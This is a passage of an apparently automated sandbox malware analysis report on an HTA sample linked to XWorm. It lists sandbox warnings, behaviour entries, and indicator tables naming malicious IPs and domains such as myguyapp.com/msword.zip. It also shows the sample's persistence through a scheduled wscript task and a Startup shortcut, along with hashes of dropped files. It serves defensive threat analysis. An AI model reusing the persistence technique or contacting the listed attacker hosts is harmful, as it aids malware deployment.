                              • Successful, ratio: 100%
                              • Number of executed functions: 107
                              • Number of non-executed functions: 292
                              Cookbook Comments:
                              • Found application associated with file extension: .hta
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 23.195.60.171, 2.19.198.75, 23.32.238.130, 162.159.61.3, 172.64.41.3, 3.233.129.217, 3.219.243.226, 52.22.41.97, 52.6.155.20, 23.195.39.65, 2.22.50.144, 2.22.50.131, 23.195.62.26, 20.12.23.50, 23.195.76.153, 13.107.246.63
                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                              • Execution Graph export aborted for target mshta.exe, PID 1368 because there are no executed function
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              00:33:52Task SchedulerRun new task: Wagner path: wscript s>//B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                              00:33:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url
                              19:32:59API Interceptor1x Sleep call for process: mshta.exe modified
                              19:33:02API Interceptor101x Sleep call for process: powershell.exe modified
                              19:33:16API Interceptor2x Sleep call for process: AcroCEF.exe modified
                              19:34:24API Interceptor442x Sleep call for process: timeout.exe modified
                              19:34:28API Interceptor2551x Sleep call for process: Carter.pif modified
                              19:35:41API Interceptor1032359x Sleep call for process: RegAsm.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              193.26.115.21c2.htaGet hashmaliciousXWormBrowse
                              • myguyapp.com/msword.zip

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              me-work.comc2.htaGet hashmaliciousXWormBrowse
                              • 193.26.115.21
                              c2.htaGet hashmaliciousXWormBrowse
                              • 193.26.115.21
                              c2.htaGet hashmaliciousXWormBrowse
                              • 87.120.117.152
                              p5.htaGet hashmaliciousXWormBrowse
                              • 45.88.186.197
                              myguyapp.comc2.htaGet hashmaliciousXWormBrowse
                              • 193.26.115.21
                              c2.htaGet hashmaliciousXWormBrowse
                              • 193.26.115.21
                              EeSNugjFh5.batGet hashmaliciousUnknownBrowse
                              • 193.26.115.21
                              c2.htaGet hashmaliciousXWormBrowse
                              • 193.26.115.21

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              QUICKPACKETUSarmv5l.elfGet hashmaliciousMiraiBrowse
                              • 23.133.3.186
                              elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                              • 23.133.3.168
                              loligang.x86.elfGet hashmaliciousMiraiBrowse
                              • 185.225.234.108
                              c2.htaGet hashmaliciousXWormBrowse
                              • 193.26.115.21
                              c2.htaGet hashmaliciousXWormBrowse
                              • 193.26.115.21
                              EeSNugjFh5.batGet hashmaliciousUnknownBrowse
                              • 193.26.115.21
                              https://webradiojaguar.net/FNB-POP.pdfGet hashmaliciousUnknownBrowse
                              • 172.82.129.154
                              c2.htaGet hashmaliciousXWormBrowse
                              • 193.26.115.21
                              Play_VM-NowCRQW.htmlGet hashmaliciousHTMLPhisherBrowse
                              • 172.82.129.154
                              new.ini.ps1Get hashmaliciousUnknownBrowse
                              • 167.88.162.71

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                              • 193.26.115.21
                              SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              • 193.26.115.21
                              TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                              • 193.26.115.21
                              wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 193.26.115.21
                              LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                              • 193.26.115.21
                              Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                              • 193.26.115.21
                              Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                              • 193.26.115.21
                              RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                              • 193.26.115.21
                              FEDEX234598765.htmlGet hashmaliciousWinSearchAbuseBrowse
                              • 193.26.115.21
                              3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                              • 193.26.115.21
                              37f463bf4616ecd445d4a1937da06e19lem.exeGet hashmaliciousVidarBrowse
                              • 193.26.115.21
                              Setup.msiGet hashmaliciousVidarBrowse
                              • 193.26.115.21
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                              • 193.26.115.21
                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                              • 193.26.115.21
                              SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              • 193.26.115.21
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                              • 193.26.115.21
                              wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                              • 193.26.115.21
                              AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                              • 193.26.115.21
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                              • 193.26.115.21
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                              • 193.26.115.21

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\220239\Carter.pifc2.htaGet hashmaliciousXWormBrowse
                                c2.htaGet hashmaliciousXWormBrowse
                                  c2.htaGet hashmaliciousXWormBrowse
                                    FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                      InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                        vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                          fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                            fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                              qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                  C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrc2.htaGet hashmaliciousXWormBrowse
                                                    c2.htaGet hashmaliciousXWormBrowse
                                                      c2.htaGet hashmaliciousXWormBrowse
                                                        FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                          InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                            vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                                              fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                                fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                                  qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):5.280609857232686
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLDuBW+q2Pwkn2nKuAl9OmbnIFUt8O7nL0Zmw+O7nLUVkwOwkn2nKuAl9Ombjd:7/DuBXvYfHAahFUt8O/0/+O/05JfHAae
                                                                      MD5:5A04E7EA5742F7D17FDCC8AC23ADD501
                                                                      SHA1:51B96B78C7357246D4CD9D49859B772BC3255ABD
                                                                      SHA-256:CDE2996391156CB1FA00BA22C7E3DF7F83EF92AD68EE417F524B9F11F550C648
                                                                      SHA-512:E054F5137EB6F22D786DDF50B43E6C54DE713A1EDA41685FB618DBFB1CD1088F83675AF4018A1E5E0C9D1A8C77F61EF5B671BB9D6429F6EE108B003F9839480F
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.561 1dc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/15-19:33:06.573 1dc8 Recovering log #3.2024/12/15-19:33:06.573 1dc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):5.280609857232686
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLDuBW+q2Pwkn2nKuAl9OmbnIFUt8O7nL0Zmw+O7nLUVkwOwkn2nKuAl9Ombjd:7/DuBXvYfHAahFUt8O/0/+O/05JfHAae
                                                                      MD5:5A04E7EA5742F7D17FDCC8AC23ADD501
                                                                      SHA1:51B96B78C7357246D4CD9D49859B772BC3255ABD
                                                                      SHA-256:CDE2996391156CB1FA00BA22C7E3DF7F83EF92AD68EE417F524B9F11F550C648
                                                                      SHA-512:E054F5137EB6F22D786DDF50B43E6C54DE713A1EDA41685FB618DBFB1CD1088F83675AF4018A1E5E0C9D1A8C77F61EF5B671BB9D6429F6EE108B003F9839480F
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.561 1dc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/15-19:33:06.573 1dc8 Recovering log #3.2024/12/15-19:33:06.573 1dc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):336
                                                                      Entropy (8bit):5.227762615193555
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLIq2Pwkn2nKuAl9Ombzo2jMGIFUt8O7nLTcZmw+O7nLTifkwOwkn2nKuAl9OU:7/IvYfHAa8uFUt8O/Tc/+O/Tif5JfHAv
                                                                      MD5:81B01F582DCAC4FE045F6C641897C9BD
                                                                      SHA1:C77C158BA9D41653C4CE5A742C39C2819851607D
                                                                      SHA-256:B1FB5A4D48462B52CCD1620C2A7ECD1340E211A30E85A95BA296C209E0086346
                                                                      SHA-512:62BA78E92015F25B814E26312F46E90A905E06B6C609A268A45C784494F96D9077BACDF8CC267218A247CE4BC79BD4E8C1B6B581755C84BDC9FB0E5F81382C25
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.599 1e74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/15-19:33:06.602 1e74 Recovering log #3.2024/12/15-19:33:06.604 1e74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):336
                                                                      Entropy (8bit):5.227762615193555
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLIq2Pwkn2nKuAl9Ombzo2jMGIFUt8O7nLTcZmw+O7nLTifkwOwkn2nKuAl9OU:7/IvYfHAa8uFUt8O/Tc/+O/Tif5JfHAv
                                                                      MD5:81B01F582DCAC4FE045F6C641897C9BD
                                                                      SHA1:C77C158BA9D41653C4CE5A742C39C2819851607D
                                                                      SHA-256:B1FB5A4D48462B52CCD1620C2A7ECD1340E211A30E85A95BA296C209E0086346
                                                                      SHA-512:62BA78E92015F25B814E26312F46E90A905E06B6C609A268A45C784494F96D9077BACDF8CC267218A247CE4BC79BD4E8C1B6B581755C84BDC9FB0E5F81382C25
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.599 1e74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/15-19:33:06.602 1e74 Recovering log #3.2024/12/15-19:33:06.604 1e74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\7ad22818-5760-4e1c-b9db-514b2e75dd5a.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.967403857886107
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                      MD5:B7761633048D74E3C02F61AD04E00147
                                                                      SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                      SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                      SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.967403857886107
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                      MD5:B7761633048D74E3C02F61AD04E00147
                                                                      SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                      SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                      SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF6b1eba.TMP (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.967403857886107
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                      MD5:B7761633048D74E3C02F61AD04E00147
                                                                      SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                      SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                      SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ab4ceac5-4aa5-47a5-8e37-bdf7e1dc1b27.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:modified
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.9526200811043966
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqLXhsBdOg2H5caq3QYiubInP7E4TX:Y2sRdscydMHA3QYhbG7n7
                                                                      MD5:9925F1077DCD49A44A3C847A1C60405B
                                                                      SHA1:D39F9FDB683C04DC4ECE9D0CAD4C10DC70134D9B
                                                                      SHA-256:D543506C84B22F36D384A6581C79ECDE469FC1B31ED18E2D96ECBE6ED87AAAD8
                                                                      SHA-512:7BA0BCCF1B65D78B57B6EFB015D26F975DCAE41F282D356B7EB0E28B7B69283FE8B5D4BDDD528F80BCA100D2FC0AE973330B5E87BFB066429F3871880F3C20AE
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378869198931816","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":628382},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4320
                                                                      Entropy (8bit):5.254435375995293
                                                                      Encrypted:false
                                                                      SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7p911k:etJCV4FiN/jTN/2r8Mta02fEhgO73goI
                                                                      MD5:7DB72E60FBD1F2AA2A1AADB8DCFA4262
                                                                      SHA1:EF8C648D1F164F59A61DC16363C9D4282B5D3784
                                                                      SHA-256:93EE3B02DC1CC22F1BF5BE25B05263FA07ADFD5CD35F8AA832514EC15FD61265
                                                                      SHA-512:8AA7290E21134C813DD6EBB8E5C0C6052B5A782D12A619027BAE06C54C1FA18100C6470B2CF30CA3005A6876B52C46D20F403949E2F74AC41CC40910075746DD
                                                                      Malicious:false
                                                                      Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):324
                                                                      Entropy (8bit):5.231836495917372
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLoMq2Pwkn2nKuAl9OmbzNMxIFUt8O7nLtRXZmw+O7nLtRFkwOwkn2nKuAl9Ob:7/oMvYfHAa8jFUt8O/tRX/+O/tRF5Jfv
                                                                      MD5:FBDEFADD19363353A1B10D0E5575B432
                                                                      SHA1:D175872BC711A72C88705BD7923D725224467A52
                                                                      SHA-256:002E7464A1C4870AC1B94ED8297D1EEBEF5F4E126111FD442F9F62BB66895458
                                                                      SHA-512:A357B8B24C5E9DD616CC18E22FB9A513848F898B8A0133B439E8BF41BA21B0DAE0D493FBA1DAAFAA84E78B908E7AC9932DDEB5432F319BAD9E8833C0BEF8E9AD
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.736 1e74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/15-19:33:06.737 1e74 Recovering log #3.2024/12/15-19:33:06.737 1e74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):324
                                                                      Entropy (8bit):5.231836495917372
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLoMq2Pwkn2nKuAl9OmbzNMxIFUt8O7nLtRXZmw+O7nLtRFkwOwkn2nKuAl9Ob:7/oMvYfHAa8jFUt8O/tRX/+O/tRF5Jfv
                                                                      MD5:FBDEFADD19363353A1B10D0E5575B432
                                                                      SHA1:D175872BC711A72C88705BD7923D725224467A52
                                                                      SHA-256:002E7464A1C4870AC1B94ED8297D1EEBEF5F4E126111FD442F9F62BB66895458
                                                                      SHA-512:A357B8B24C5E9DD616CC18E22FB9A513848F898B8A0133B439E8BF41BA21B0DAE0D493FBA1DAAFAA84E78B908E7AC9932DDEB5432F319BAD9E8833C0BEF8E9AD
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.736 1e74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/15-19:33:06.737 1e74 Recovering log #3.2024/12/15-19:33:06.737 1e74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                      Category:dropped
                                                                      Size (bytes):86016
                                                                      Entropy (8bit):4.445280752952866
                                                                      Encrypted:false
                                                                      SSDEEP:384:yezci5tuiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rBs3OazzU89UTTgUL
                                                                      MD5:22490206BA3586845BB72B90E2D8EDE6
                                                                      SHA1:2FCA1A167EB95B6FA89122271B7CE473CBF51283
                                                                      SHA-256:141820C298D4D0E02DD3B1E35FB765976EE8DCBC972485675AFCC861B8304147
                                                                      SHA-512:5CCE9275AAD9B504FC5558D5517404695710A80CFD01F94F7C22FC41B261DDC90F166E21EE69A65CF107D84EF7A5981AAD0602E073D5C391CC77BB7E907F982E
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):3.7766721316090828
                                                                      Encrypted:false
                                                                      SSDEEP:48:7Mep/E2ioyVRioy9oWoy1Cwoy1hKOioy1noy1AYoy1Wioy1hioybioyJoy1noy1w:7FpjuRF8XKQIub9IVXEBodRBkL
                                                                      MD5:260B79B1434A336495299F6622A2828D
                                                                      SHA1:423DCD30126FC78D66E56E07764D9D88E4FC99FD
                                                                      SHA-256:A73CC64A4A1A7302D601CAB9BA45EB0659B014A6EEAA7DD55D80DD04D661F0FE
                                                                      SHA-512:BADEB30F8566D5114615895D5F19082E86D2C5854FF107AF03E3568F9B115A1EC5973619AC71CFAEDEA52DAF402520BE543CEACE0827781A65EF6B0F3B89291E
                                                                      Malicious:false
                                                                      Preview:.... .c.......-`...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Certificate, Version=3
                                                                      Category:dropped
                                                                      Size (bytes):1391
                                                                      Entropy (8bit):7.705940075877404
                                                                      Encrypted:false
                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                      Malicious:false
